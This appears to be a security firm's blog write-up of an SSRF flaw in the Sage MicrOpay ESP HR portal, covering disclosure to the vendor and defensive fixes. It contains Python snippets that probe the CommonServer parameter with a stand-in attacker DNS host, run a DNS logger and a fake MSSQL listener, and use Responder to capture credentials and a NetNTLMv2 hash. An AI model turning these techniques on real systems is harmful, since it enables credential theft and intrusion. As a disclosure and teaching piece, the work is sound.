Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client, and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include .pl, .sh, .exe and, in this instance, .dll.


Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening, but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database, on which server, it should connect to. In any sane application this value would live in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do: I threw a bunch of garbage at the interesting parameters to see what would stick.
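In spirit, the probing step looks something like the sketch below. The hostname is a placeholder (the real one is redacted above), the payload list is purely illustrative, and I’ve trimmed the parameter set down to the interesting ones:

```python
import urllib.parse
import urllib.request

# Rough sketch of throwing values at the interesting parameters.
# BASE is a placeholder for the redacted target URL.
BASE = "https://esp.example.com.au/ESP/iwContentGen.dll/start"

payloads = [
    "not-a-real-server",            # garbage
    "127.0.0.1",                    # internal
    "canary.attacker-dns.example",  # a name whose DNS we control
]

for host in payloads:
    params = {
        "InitialPage": "100",
        "NOLOGIN": "Y",
        "CommonDatabase": "53227 EvolutionCommon",
        "CommonServer": host,  # the parameter under test
    }
    url = BASE + "?" + urllib.parse.urlencode(params)
    try:
        with urllib.request.urlopen(url, timeout=20) as resp:
            print(host, "->", resp.status)
    except Exception as exc:
        print(host, "->", exc)  # most payloads simply time out
```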

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.
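If you don’t happen to keep a pet DNS server around, a bare-bones stand-in is only a few lines of Python. This is a sketch rather than our actual tooling – run it on a host that’s authoritative for a domain you control, and it prints every name it gets asked about:

```python
import socket

def qname(data: bytes) -> str:
    # The DNS header is 12 bytes; the query name follows as
    # length-prefixed labels terminated by a zero byte.
    labels, i = [], 12
    while i < len(data) and data[i] != 0:
        length = data[i]
        labels.append(data[i + 1:i + 1 + length].decode("ascii", "replace"))
        i += 1 + length
    return ".".join(labels)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", 53))  # binding port 53 needs root/CAP_NET_BIND_SERVICE
print("watching for DNS queries...")
while True:
    packet, (src, _) = sock.recvfrom(512)
    print(f"{src} asked about: {qname(packet)}")
```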

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we could get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.
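There’s nothing magic about netcat here, by the way. Any listener that logs the inbound connection will do – something like this stand-in for nc -lvnp 1433, which also hex-dumps the first bytes the client sends (for a real MSSQL client, presumably a TDS pre-login packet):

```python
import socket

# Stand-in for `nc -lvnp 1433`: accept one connection on the MSSQL
# port and dump whatever the client sends first.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 1433))
srv.listen(1)
print("waiting on tcp/1433...")
conn, (src, sport) = srv.accept()
print(f"connection from {src}:{sport}")
print(conn.recv(4096).hex(" "))  # hex-dump the first chunk
conn.close()
```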

So we have a web application on the inside… and it thinks I’m its database server…


I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, negotiate and accept more or less any authentication request a client is willing to send, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on a variation that made my Responder go off like crazy.


For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged, and we end up with a NetNTLMv2 hash – the long alphanumeric string Responder prints at the end of its output.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password. But see that ‘$’ at the end of where I’ve redacted the username? It means the account being used to authenticate is the AD account of the actual server itself, which in turn means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do, however, is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet, so at this point the attack becomes kind of academic.
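For what it’s worth, checking whether an internet-facing service will accept NTLM at all is easy enough: request it unauthenticated and look for an NTLM (or Negotiate) challenge in the WWW-Authenticate header of the 401 response. A quick sketch, with a placeholder URL:

```python
import urllib.error
import urllib.request

def offers_ntlm(url: str) -> bool:
    # A 401 response carrying an NTLM (or Negotiate) challenge means
    # the endpoint is willing to do NTLM authentication.
    try:
        urllib.request.urlopen(url, timeout=10)
    except urllib.error.HTTPError as err:
        if err.code == 401:
            challenges = err.headers.get_all("WWW-Authenticate") or []
            return any(c.strip().startswith(("NTLM", "Negotiate"))
                       for c in challenges)
    return False

# Placeholder endpoint - Exchange Web Services is a classic candidate.
print(offers_ntlm("https://mail.example.com/EWS/Exchange.asmx"))
```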

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally, I resorted to what I think of as ‘the Tavis’ – publicly asking Twitter to help me find a security contact at the company, in the style of Tavis Ormandy.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed along the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should never have been given the opportunity to choose the back-end database server. That value should have been set in a config file somewhere.
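Something like this, to be concrete – a minimal sketch (the file path and key names are made up) of the boring, correct approach:

```python
import configparser

# Minimal sketch: the database target lives in server-side config that
# ordinary users can't see or influence. Path and key names are made up.
config = configparser.ConfigParser()
config.read("/etc/esp/esp.ini")

DB_SERVER = config["database"]["server"]  # e.g. "sql02.internal"
DB_NAME = config["database"]["name"]      # e.g. "EvolutionCommon"

# Anything arriving in a request named CommonServer or CommonDatabase
# is simply ignored; the connection target is fixed at deploy time.
```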

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!
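A quick way to sanity-check that from one of your servers: try to reach an external host on the ports this attack relied on, and make sure both attempts fail. A throwaway sketch, with a placeholder hostname:

```python
import socket

# Throwaway egress check: both connections should FAIL if outbound
# filtering is working. The hostname is a placeholder for any internet
# host you control that listens on these ports.
for port in (445, 1433):
    s = socket.socket()
    s.settimeout(5)
    try:
        s.connect(("egress-test.example.com", port))
        print(f"tcp/{port}: reachable outbound - fix your firewall")
    except OSError:
        print(f"tcp/{port}: blocked (good)")
    finally:
        s.close()
```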

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.

 
